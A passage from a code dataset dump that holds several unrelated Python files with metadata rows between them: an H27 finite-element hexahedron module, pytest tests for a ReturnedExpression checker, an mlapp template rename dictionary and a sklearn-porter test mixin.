0.5*s**2*t**2 + 0.5*s**2 + 0.5*t**2 - 0.5,
1.0*r**2*s*t**2 - 1.0*r**2*s - 1.0*r*s*t**2 + 1.0*r*s,
1.0*r**2*s**2*t - 1.0*r**2*t - 1.0*r*s**2*t + 1.0*r*t],
[1.0*r*s**2*t**2 - 1.0*r*s**2 - 1.0*r*t**2 + 1.0*r +
0.5*s**2*t**2 - 0.5*s**2 - 0.5*t**2 + 0.5,
1.0*r**2*s*t**2 - 1.0*r**2*s + 1.0*r*s*t**2 - 1.0*r*s,
1.0*r**2*s**2*t - 1.0*r**2*t + 1.0*r*s**2*t - 1.0*r*t],
[1.0*r*s**2*t**2 - 1.0*r*s**2 - 1.0*r*s*t**2 + 1.0*r*s,
1.0*r**2*s*t**2 - 1.0*r**2*s - 0.5*r**2*t**2 + 0.5*r**2 -
1.0*s*t**2 + 1.0*s + 0.5*t**2 - 0.5,
1.0*r**2*s**2*t - 1.0*r**2*s*t - 1.0*s**2*t + 1.0*s*t],
[1.0*r*s**2*t**2 - 1.0*r*s**2 + 1.0*r*s*t**2 - 1.0*r*s,
1.0*r**2*s*t**2 - 1.0*r**2*s + 0.5*r**2*t**2 - 0.5*r**2 -
1.0*s*t**2 + 1.0*s - 0.5*t**2 + 0.5,
1.0*r**2*s**2*t + 1.0*r**2*s*t - 1.0*s**2*t - 1.0*s*t],
[1.0*r*s**2*t**2 - 1.0*r*s**2*t - 1.0*r*t**2 + 1.0*r*t,
1.0*r**2*s*t**2 - 1.0*r**2*s*t - 1.0*s*t**2 + 1.0*s*t,
1.0*r**2*s**2*t - 0.5*r**2*s**2 - 1.0*r**2*t + 0.5*r**2 -
1.0*s**2*t + 0.5*s**2 + 1.0*t - 0.5],
[1.0*r*s**2*t**2 + 1.0*r*s**2*t - 1.0*r*t**2 - 1.0*r*t,
1.0*r**2*s*t**2 + 1.0*r**2*s*t - 1.0*s*t**2 - 1.0*s*t,
1.0*r**2*s**2*t + 0.5*r**2*s**2 - 1.0*r**2*t - 0.5*r**2 -
1.0*s**2*t - 0.5*s**2 + 1.0*t + 0.5],
[-2.0*r*s**2*t**2 + 2.0*r*s**2 + 2.0*r*t**2 - 2.0*r,
-2.0*r**2*s*t**2 + 2.0*r**2*s + 2.0*s*t**2 - 2.0*s,
-2.0*r**2*s**2*t + 2.0*r**2*t + 2.0*s**2*t - 2.0*t]])
@njit(nogil=True, parallel=True, cache=__cache)
def dshp_H27_bulk(pcoords: ndarray):
    """
    Evaluate the H27 shape function derivatives at several points at once.

    `pcoords` holds one point per row (natural coordinates); the result has
    shape (nP, 27, 3), one (27, 3) derivative matrix per input point.
    """
    num_points = pcoords.shape[0]
    out = np.zeros((num_points, 27, 3), dtype=pcoords.dtype)
    # Points are independent, so the loop parallelizes cleanly.
    for j in prange(num_points):
        out[j] = dshp_H27(pcoords[j])
    return out
@njit(nogil=True, parallel=True, fastmath=True, cache=__cache)
def volumes_H27(ecoords: np.ndarray, qpos: np.ndarray,
                qweight: np.ndarray):
    """
    Compute cell volumes of H27 elements by Gauss quadrature.

    `ecoords` holds nodal coordinates per element, `qpos`/`qweight` the
    quadrature points and weights. Returns one volume per element.
    """
    num_cells = ecoords.shape[0]
    res = np.zeros(num_cells, dtype=ecoords.dtype)
    # Outer loop over quadrature points keeps the parallel inner loop
    # race-free: each cell accumulates only its own entry.
    for q in range(len(qweight)):
        dshp = dshp_H27(qpos[q])
        w = qweight[q]
        for c in prange(num_cells):
            jacobian = ecoords[c].T @ dshp
            res[c] += w * np.linalg.det(jacobian)
    return res
class H27(TriquadraticHexaHedron):
    """
    27-node isoparametric triquadratic hexahedron.

    Node numbering, layer by layer along the third natural coordinate
    (corner nodes 0-7, then mid-edge, mid-face and center nodes):

        top
        7---14---6
        |    |   |
        15--25--13
        |    |   |
        4---12---5

        middle
        19--23--18
        |    |   |
        20--26--21
        |    |   |
        16--22--17

        bottom
        3---10---2
        |    |   |
        11--24---9
        |    |   |
        0----8---1
    """

    @classmethod
    def lcoords(cls, *args, **kwargs):
        # Natural (local) coordinates of the 27 nodes, matching the
        # numbering in the class docstring: rows 0-7 are corners (all
        # entries +/-1), 8-19 mid-edge (one zero), 20-25 mid-face
        # (two zeros), 26 the centroid.
        return np.array([
            [-1., -1., -1], [1., -1., -1.], [1., 1., -1.], [-1., 1., -1.],
            [-1., -1., 1.], [1., -1., 1.], [1., 1., 1.], [-1., 1., 1.],
            [0., -1., -1.], [1., 0., -1.], [0., 1., -1.], [-1., 0., -1.],
            [0., -1., 1.], [1., 0., 1.], [0., 1., 1.], [-1., 0., 1.],
            [-1., -1., 0.], [1., -1., 0.], [1., 1., 0.], [-1., 1., 0.],
            [-1., 0., 0.], [1., 0., 0.], [0., -1., 0.], [0., 1., 0.],
            [0., 0., -1.], [0., 0., 1.], [0., 0., 0.]])

    @classmethod
    def lcenter(cls, *args, **kwargs):
        # Element center in natural coordinates.
        return np.array([0., 0., 0.])

    def shape_function_derivatives(self, coords=None, *args, **kwargs):
        # Derivatives of the 27 shape functions w.r.t. the natural
        # coordinates. Accepts a single point (1d) or a batch of points
        # (2d, one point per row); falls back to the stored point data
        # when no coordinates are given.
        coords = self.pointdata.x.to_numpy() if coords is None else coords
        if len(coords.shape) == 2:
            return dshp_H27_bulk(coords)
        else:
            return dshp_H27(coords)

    def volumes(self, coords=None, topo=None):
        # Cell volumes via a 3x3x3 Gauss quadrature rule over each cell's
        # nodal coordinates; defaults pull geometry/topology from the mesh.
        coords = self.pointdata.x.to_numpy() if coords is None else coords
        topo = self.nodes.to_numpy() if topo is None else topo
        ecoords = cells_coords(coords, topo)
        qpos, qweight = Gauss(3, 3, 3)
        return volumes_H27(ecoords, qpos, qweight)
| 51.828746
| 79
| 0.387656
| 4,690
| 16,948
| 1.392964
| 0.02516
| 0.102862
| 0.118935
| 0.072861
| 0.814786
| 0.801776
| 0.77407
| 0.76657
| 0.7531
| 0.748967
| 0
| 0.256666
| 0.267583
| 16,948
| 326
| 80
| 51.98773
| 0.269637
| 0.014987
| 0
| 0.219858
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035461
| false
| 0
| 0.021277
| 0.007092
| 0.099291
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
db7ad8d065ccfcdf01d0e72a9074476aee53011d
| 12,395
|
py
|
Python
|
peon/tests/test_project/test_file/test_function_def/test_expressions/test_returned_expr.py
|
roch1990/peon
|
0e9e40956c05138c0820fe380b354fdd1fe95e01
|
[
"MIT"
] | 32
|
2020-05-18T14:02:59.000Z
|
2022-02-06T15:00:12.000Z
|
peon/tests/test_project/test_file/test_function_def/test_expressions/test_returned_expr.py
|
roch1990/peon
|
0e9e40956c05138c0820fe380b354fdd1fe95e01
|
[
"MIT"
] | 42
|
2020-05-22T20:29:08.000Z
|
2021-03-10T21:24:23.000Z
|
peon/tests/test_project/test_file/test_function_def/test_expressions/test_returned_expr.py
|
roch1990/peon
|
0e9e40956c05138c0820fe380b354fdd1fe95e01
|
[
"MIT"
] | 4
|
2020-07-02T06:32:42.000Z
|
2022-01-24T22:46:02.000Z
|
import _ast
import sys
import pytest
from peon.src.project.file.function_def.expression.returned_expr import ReturnedExpression
# Fix: `sys.version_info > (3, 7)` is True on every 3.7.x release too
# (version_info is a 5-tuple), so the test was skipped on ALL versions.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_func():
    # when method returns Function.staticm() -- a call is a non-None value
    assert ReturnedExpression(
        _ast.Return(
            value=_ast.Call(
                func=_ast.Attribute(
                    value=_ast.Name(id='Function', ctx=_ast.Load()), attr='staticm', ctx=_ast.Load(),
                ), args=[], keywords=[],
            ),
            lineno=1,
        ),
    ).value_not_none() is True
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_int_one():
    # when method returns 1
    assert ReturnedExpression(_ast.Return(value=_ast.Num(n=1), lineno=1)).value_not_none() is True
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_int_zero():
    # when method returns 0 (falsy, but still not None)
    assert ReturnedExpression(_ast.Return(value=_ast.Num(n=0), lineno=1)).value_not_none() is True
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_float_zero():
    # when method returns 0.0 (falsy, but still not None)
    assert ReturnedExpression(_ast.Return(value=_ast.Num(n=0.0), lineno=1)).value_not_none() is True
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_float_limit_to_zero():
    # when method returns 0.0000000000000000000000001
    assert ReturnedExpression(
        _ast.Return(value=_ast.Num(n=0.0000000000000000000000001), lineno=1),
    ).value_not_none() is True
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_empty_string():
    # when method returns ''
    try:
        assert ReturnedExpression(_ast.Return(value=_ast.Str(s=''), lineno=1)).value_not_none() is False
    except AttributeError:
        # _ast.Str may be unavailable on newer interpreters; best-effort skip.
        pass
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_filled_string():
    # when method returns 'test'
    try:
        assert ReturnedExpression(_ast.Return(value=_ast.Str(s='test'), lineno=1)).value_not_none() is True
    except AttributeError:
        # _ast.Str may be unavailable on newer interpreters; best-effort skip.
        pass
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_empty_joined_string():
    # when method returns an empty f-string
    assert ReturnedExpression(_ast.Return(value=_ast.JoinedStr(values=[]), lineno=1)).value_not_none() is False
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_filled_joined_string():
    # when method returns '{}{}{}'.format('a', 'b', 'c')
    assert ReturnedExpression(_ast.Return(value=_ast.JoinedStr(values=['a', 'b', 'c']), lineno=1)).value_not_none() is True
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_none():
    # when method returns None explicitly
    assert ReturnedExpression(_ast.Return(value=_ast.NameConstant(value=None), lineno=1)).value_not_none() is False
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_class_constant():
    # when method returns SomeClass.CONSTANT
    assert ReturnedExpression(
        _ast.Return(
            value=_ast.Attribute(value=_ast.Name(id='SomeClass', ctx=_ast.Load()), attr='CONSTANT', ctx=_ast.Load()),
            lineno=1,
        ),
    ).value_not_none() is True
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_empty_list():
    # when method returns []
    assert ReturnedExpression(
        _ast.Return(value=_ast.List(elts=[], ctx=_ast.Load()), lineno=1),
    ).value_not_none() is False
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_filled_list():
    # when method returns ['1']
    assert ReturnedExpression(
        _ast.Return(value=_ast.List(elts=['1'], ctx=_ast.Load()), lineno=1),
    ).value_not_none() is True
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_empty_tuple():
    # when method returns ()
    assert ReturnedExpression(
        _ast.Return(value=_ast.Tuple(elts=[], ctx=_ast.Load()), lineno=1),
    ).value_not_none() is False
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_filled_tuple():
    # when method returns ('1')
    assert ReturnedExpression(
        _ast.Return(value=_ast.Tuple(elts=['1'], ctx=_ast.Load()), lineno=1),
    ).value_not_none() is True
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_empty_dict():
    # when method returns {}
    assert ReturnedExpression(
        _ast.Return(value=_ast.Dict(keys=[], values=[]), lineno=1),
    ).value_not_none() is False
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_filled_dict():
    # when method returns {'1': '2'}
    assert ReturnedExpression(
        _ast.Return(value=_ast.Dict(keys=['1'], values=['2']), lineno=1),
    ).value_not_none() is True
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_empty_dict_by_keyword():
    # when method returns dict()
    assert ReturnedExpression(
        _ast.Return(
            value=_ast.Call(
                func=_ast.Name(id='dict', ctx=_ast.Load()), args=[], keywords=[],
            ),
            lineno=1,
        ),
    ).value_not_none() is False
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_filled_dict_by_keyword():
    # when method returns dict(a='b')
    try:
        assert ReturnedExpression(
            _ast.Return(
                value=_ast.Call(
                    func=_ast.Name(id='dict', ctx=_ast.Load()), args=[],
                    keywords=[_ast.keyword(arg='a', value=_ast.Str(s='b'))],
                ),
                lineno=1,
            ),
        ).value_not_none() is True
    except AttributeError:
        # _ast.Str unavailable: fall back to a JoinedStr keyword value.
        assert ReturnedExpression(
            _ast.Return(
                value=_ast.Call(
                    func=_ast.Name(id='dict', ctx=_ast.Load()), args=[],
                    keywords=[_ast.keyword(arg='a', value=_ast.JoinedStr(values=['a', 'b']))],
                ),
                lineno=1,
            ),
        ).value_not_none() is True
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_empty_list_by_keyword():
    # when method returns list()
    assert ReturnedExpression(
        _ast.Return(
            value=_ast.Call(
                func=_ast.Name(id='list', ctx=_ast.Load()), args=[], keywords=[],
            ),
            lineno=1,
        ),
    ).value_not_none() is False
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_filled_list_by_keyword():
    # when method returns list('1')
    try:
        assert ReturnedExpression(
            _ast.Return(
                value=_ast.Call(
                    func=_ast.Name(id='list', ctx=_ast.Load()), args=[_ast.Str(s='1')], keywords=[],
                ),
                lineno=1,
            ),
        ).value_not_none() is True
    except AttributeError:
        # _ast.Str unavailable: fall back to a JoinedStr argument.
        assert ReturnedExpression(
            _ast.Return(
                value=_ast.Call(
                    func=_ast.Name(id='list', ctx=_ast.Load()), args=[_ast.JoinedStr(values=['a', 'b'])], keywords=[],
                ),
                lineno=1,
            ),
        ).value_not_none() is True
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_empty_set_by_keyword():
    # when method returns set()
    assert ReturnedExpression(
        _ast.Return(
            value=_ast.Call(
                func=_ast.Name(id='set', ctx=_ast.Load()), args=[], keywords=[],
            ),
            lineno=1,
        ),
    ).value_not_none() is False
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_filled_set_by_keyword():
    # when method returns set('1')
    try:
        assert ReturnedExpression(
            _ast.Return(
                value=_ast.Call(
                    func=_ast.Name(id='set', ctx=_ast.Load()), args=[_ast.Str(s='1')], keywords=[],
                ),
                lineno=1,
            ),
        ).value_not_none() is True
    except AttributeError:
        # _ast.Str unavailable: fall back to a JoinedStr argument.
        assert ReturnedExpression(
            _ast.Return(
                value=_ast.Call(
                    func=_ast.Name(id='set', ctx=_ast.Load()), args=[_ast.JoinedStr(values=['1'])], keywords=[],
                ),
                lineno=1,
            ),
        ).value_not_none() is True
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_empty_tuple_by_keyword():
    # when method returns tuple()
    assert ReturnedExpression(
        _ast.Return(
            value=_ast.Call(
                func=_ast.Name(id='tuple', ctx=_ast.Load()), args=[], keywords=[],
            ),
            lineno=1,
        ),
    ).value_not_none() is False
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_filled_tuple_by_keyword():
    # when method returns tuple('1')
    try:
        assert ReturnedExpression(
            _ast.Return(
                value=_ast.Call(
                    func=_ast.Name(id='tuple', ctx=_ast.Load()), args=[_ast.Str(s='1')], keywords=[],
                ),
                lineno=1,
            ),
        ).value_not_none() is True
    except AttributeError:
        # _ast.Str unavailable: fall back to a JoinedStr argument.
        assert ReturnedExpression(
            _ast.Return(
                value=_ast.Call(
                    func=_ast.Name(id='tuple', ctx=_ast.Load()), args=[_ast.JoinedStr(values=['1'])], keywords=[],
                ),
                lineno=1,
            ),
        ).value_not_none() is True
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_empty_frozenset_by_keyword():
    # when method returns frozenset()
    assert ReturnedExpression(
        _ast.Return(
            value=_ast.Call(
                func=_ast.Name(id='frozenset', ctx=_ast.Load()), args=[], keywords=[],
            ),
            lineno=1,
        ),
    ).value_not_none() is False
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_value_is_filled_frozenset_by_keyword():
    # when method returns frozenset('1')
    try:
        assert ReturnedExpression(
            _ast.Return(
                value=_ast.Call(
                    func=_ast.Name(id='frozenset', ctx=_ast.Load()), args=[_ast.Str(s='1')], keywords=[],
                ),
                lineno=1,
            ),
        ).value_not_none() is True
    except AttributeError:
        # _ast.Str unavailable: fall back to a JoinedStr argument.
        assert ReturnedExpression(
            _ast.Return(
                value=_ast.Call(
                    func=_ast.Name(id='frozenset', ctx=_ast.Load()), args=[_ast.JoinedStr(values=['1'])], keywords=[],
                ),
                lineno=1,
            ),
        ).value_not_none() is True
# Fix: skip on 3.8+ only; the old `> (3, 7)` also skipped 3.7.x itself.
@pytest.mark.skipif(sys.version_info >= (3, 8), reason='test marked as for older python version (<3.8)')
def test_return_is_empty():
    # when method returns nothing, not None, only 'return'
    assert ReturnedExpression(
        _ast.Return(
            value=None,
            lineno=1,
        ),
    ).value_not_none() is False
| 37
| 123
| 0.613231
| 1,619
| 12,395
| 4.463249
| 0.058678
| 0.091337
| 0.123305
| 0.150706
| 0.937586
| 0.923194
| 0.897592
| 0.84708
| 0.826875
| 0.758926
| 0
| 0.023881
| 0.243243
| 12,395
| 334
| 124
| 37.110778
| 0.746482
| 0.062767
| 0
| 0.730924
| 0
| 0
| 0.12253
| 0
| 0
| 0
| 0
| 0
| 0.13253
| 1
| 0.11245
| true
| 0.008032
| 0.016064
| 0
| 0.128514
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
db88b060b33d3569dae91b802a9af593f466df5b
| 20,257
|
py
|
Python
|
mlapp/mlapp_cli/common/model_rename_dictionary.py
|
nbk905/mlapp
|
af650a8a302959674dd5a1bc6d15e30e90abf227
|
[
"Apache-2.0"
] | null | null | null |
mlapp/mlapp_cli/common/model_rename_dictionary.py
|
nbk905/mlapp
|
af650a8a302959674dd5a1bc6d15e30e90abf227
|
[
"Apache-2.0"
] | null | null | null |
mlapp/mlapp_cli/common/model_rename_dictionary.py
|
nbk905/mlapp
|
af650a8a302959674dd5a1bc6d15e30e90abf227
|
[
"Apache-2.0"
] | null | null | null |
# Defects fixed: (1) the regex patterns were written in non-raw strings, so
# every `\s`/`\n` was an invalid escape sequence (W605, a DeprecationWarning
# that will eventually break); (2) the same word-rule dictionaries were
# copy-pasted dozens of times. The value of `rename_dictionary` is unchanged;
# it is now assembled from small private factories, each call returning fresh
# dict objects (no shared mutable state between entries).

_LOWER = 'str.lower'
_CAP = 'str_capitalize'
# Colon separator in the "asset_name" patterns; the second form also allows
# the key and value to sit on different lines.
_SEP = r'\s*:\s*'
_NL_SEP = r'\s*\n*\s*:\s*\n*\s*'


def _word(word, word_format=_CAP, word_type='append-left', word_pattern=None):
    """Build one replacement-word descriptor."""
    entry = {"word": word, "word_format": word_format, 'word_type': word_type}
    if word_pattern is not None:
        entry["word_pattern"] = word_pattern
    return entry


def _asset_name_word(key_quote, value_quote, sep=_SEP):
    """Rule rewriting `"asset_name": "<value>` for one quote-style combination."""
    key = key_quote + 'asset_name' + key_quote
    return _word(key + ': ' + value_quote, _LOWER, 'append-right',
                 word_pattern=key + sep + value_quote)


def _config_entry(first_sep=_SEP, full=True):
    """Replacement rules for a config file located under 'configs'.

    `full=True` covers all four quote-style combinations of the asset-name
    assignment; `full=False` (JSON configs) only the double-quoted one.
    """
    words = [_asset_name_word('"', '"', first_sep)]
    if full:
        words += [_asset_name_word('"', "'"),
                  _asset_name_word("'", "'"),
                  _asset_name_word("'", '"')]
    words.append(_word('_config ', _LOWER))
    return {'inner_path': 'configs', "words": words}


def _simple_entry(*words):
    """Replacement rules for a non-config file (no inner path)."""
    return {"words": list(words)}


rename_dictionary = {
    "base": {
        # key -> file_name: value -> list of dictionaries of words to replace.
        '_data_manager.py': _simple_entry(_word('DataManager')),
        '_model_manager.py': _simple_entry(_word('ModelManager')),
        '_train_config.py': _config_entry(),
        '_forecast_config.py': _config_entry(),
    },
    "classification": {
        '_data_manager.py': _simple_entry(
            _word('DataManager'),
            _word('_feature_engineering', _LOWER),
            _word('from assets.', _LOWER, 'append-right'),
            _word('FeatureEngineering'),
        ),
        '_model_manager.py': _simple_entry(
            _word('ModelManager'),
            _word('_visualizations', _LOWER),
            _word('from assets.', _LOWER, 'append-right'),
        ),
        '_train_config.py': _config_entry(),
        # These three configs tolerate newlines around the colon.
        '_forecast_config.py': _config_entry(first_sep=_NL_SEP),
        '_feature_engineering_config.py': _config_entry(first_sep=_NL_SEP),
        '_reuse_features_and_train_config.py': _config_entry(first_sep=_NL_SEP),
        '_feature_engineering.py': _simple_entry(_word('FeatureEngineering')),
        '_visualizations.py': _simple_entry(),
    },
    "crash_course": {
        '_data_manager.py': _simple_entry(_word('DataManager')),
        '_model_manager.py': _simple_entry(_word('ModelManager')),
        '_train_config.json': _config_entry(full=False),
        '_forecast_config.json': _config_entry(full=False),
    },
    "basic_regression": {
        '_data_manager.py': _simple_entry(_word('DataManager')),
        '_model_manager.py': _simple_entry(_word('ModelManager')),
        '_train_config.py': _config_entry(),
        '_forecast_config.py': _config_entry(),
        '_custom_pipeline_config.py': _config_entry(),
        '_feature_engineering_config.py': _config_entry(),
        '_train_step_config.py': _config_entry(),
        '_reuse_features_and_train_config.py': _config_entry(),
    },
    "spark_classification": {
        '_data_manager.py': _simple_entry(
            _word('DataManager'),
            _word('_feature_engineering', _LOWER),
            _word('from assets.', _LOWER, 'append-right'),
            _word('FeatureEngineering'),
        ),
        '_model_manager.py': _simple_entry(_word('ModelManager')),
        '_train_config.py': _config_entry(),
        '_forecast_config.py': _config_entry(),
        '_feature_engineering.py': _simple_entry(_word('FeatureEngineering')),
    },
    "spark_regression": {
        '_data_manager.py': _simple_entry(_word('DataManager')),
        '_model_manager.py': _simple_entry(_word('ModelManager')),
        '_train_config.py': _config_entry(),
        '_forecast_config.py': _config_entry(),
    },
    "advanced_regression": {
        '_data_manager.py': _simple_entry(_word('DataManager')),
        '_model_manager.py': _simple_entry(_word('ModelManager')),
        '_train_config.py': _config_entry(),
        '_forecast_config.py': _config_entry(),
    }
}
| 66.416393
| 114
| 0.469221
| 1,957
| 20,257
| 4.544711
| 0.029637
| 0.149764
| 0.172476
| 0.202384
| 0.983472
| 0.981785
| 0.981785
| 0.981785
| 0.981785
| 0.981336
| 0
| 0
| 0.297477
| 20,257
| 304
| 115
| 66.634868
| 0.624974
| 0.003357
| 0
| 0.79538
| 0
| 0
| 0.455343
| 0.016843
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
dbc06fda4e8ec6de8f5b6814f726ad3044a4855c
| 3,068
|
py
|
Python
|
tests/estimator/classifier/EmbeddedData.py
|
mathewdgardner/sklearn-porter
|
d8927a6af06e96dd416be759321e93691c39cf73
|
[
"MIT"
] | 1
|
2022-02-15T12:44:37.000Z
|
2022-02-15T12:44:37.000Z
|
tests/estimator/classifier/EmbeddedData.py
|
Stardustsky/sklearn-porter
|
d8927a6af06e96dd416be759321e93691c39cf73
|
[
"MIT"
] | null | null | null |
tests/estimator/classifier/EmbeddedData.py
|
Stardustsky/sklearn-porter
|
d8927a6af06e96dd416be759321e93691c39cf73
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import numpy as np
class EmbeddedData():
    """
    Mixin of tests for estimators ported with embedded training data.

    Relies on the host test class providing: `load_*_data`,
    `_port_estimator`, `pred_in_custom`, `pred_in_py`, `_clear_estimator`,
    `estimator`, `X`, `n_features`, `N_RANDOM_FEATURE_SETS`,
    `N_EXISTING_FEATURE_SETS` and unittest's `assertListEqual`.
    (Defect fixed: the same two test bodies were copy-pasted six times;
    extracted into private helpers, public test methods unchanged.)
    """

    def _check_random_features(self):
        # Compare ported predictions against the Python estimator on random
        # feature vectors drawn uniformly from the per-feature [min, max]
        # range of the loaded data.
        self._port_estimator(embed_data=True)
        amin = np.amin(self.X, axis=0)
        amax = np.amax(self.X, axis=0)
        shape = (self.N_RANDOM_FEATURE_SETS, self.n_features)
        X = np.random.uniform(low=amin, high=amax, size=shape)
        Y_py = self.estimator.predict(X).tolist()
        Y = [self.pred_in_custom(x) for x in X]
        self._clear_estimator()
        self.assertListEqual(Y, Y_py)

    def _check_existing_features(self):
        # Compare ported predictions against the Python estimator on (a
        # bounded number of) the actual loaded samples.
        self._port_estimator(embed_data=True)
        preds, ground_truth = [], []
        n = min(self.N_EXISTING_FEATURE_SETS, len(self.X))
        for x in self.X[:n]:
            preds.append(self.pred_in_custom(x))
            ground_truth.append(self.pred_in_py(x))
        self._clear_estimator()
        # noinspection PyUnresolvedReferences
        self.assertListEqual(preds, ground_truth)

    def test_random_features__binary_data__embedded(self):
        self.load_binary_data()
        self._check_random_features()

    def test_random_features__iris_data__embedded(self):
        self.load_iris_data()
        self._check_random_features()

    def test_random_features__digits_data__embedded(self):
        self.load_digits_data()
        self._check_random_features()

    def test_existing_features__binary_data__embedded(self):
        self.load_binary_data()
        self._check_existing_features()

    def test_existing_features__iris_data__embedded(self):
        self.load_iris_data()
        self._check_existing_features()

    def test_existing_features__digits_data__embedded(self):
        self.load_digits_data()
        self._check_existing_features()
| 39.333333
| 62
| 0.651565
| 423
| 3,068
| 4.399527
| 0.132388
| 0.032241
| 0.048361
| 0.064481
| 0.966147
| 0.966147
| 0.966147
| 0.966147
| 0.966147
| 0.966147
| 0
| 0.002986
| 0.235984
| 3,068
| 78
| 63
| 39.333333
| 0.790956
| 0.042047
| 0
| 0.876923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092308
| 1
| 0.092308
| false
| 0
| 0.015385
| 0
| 0.123077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
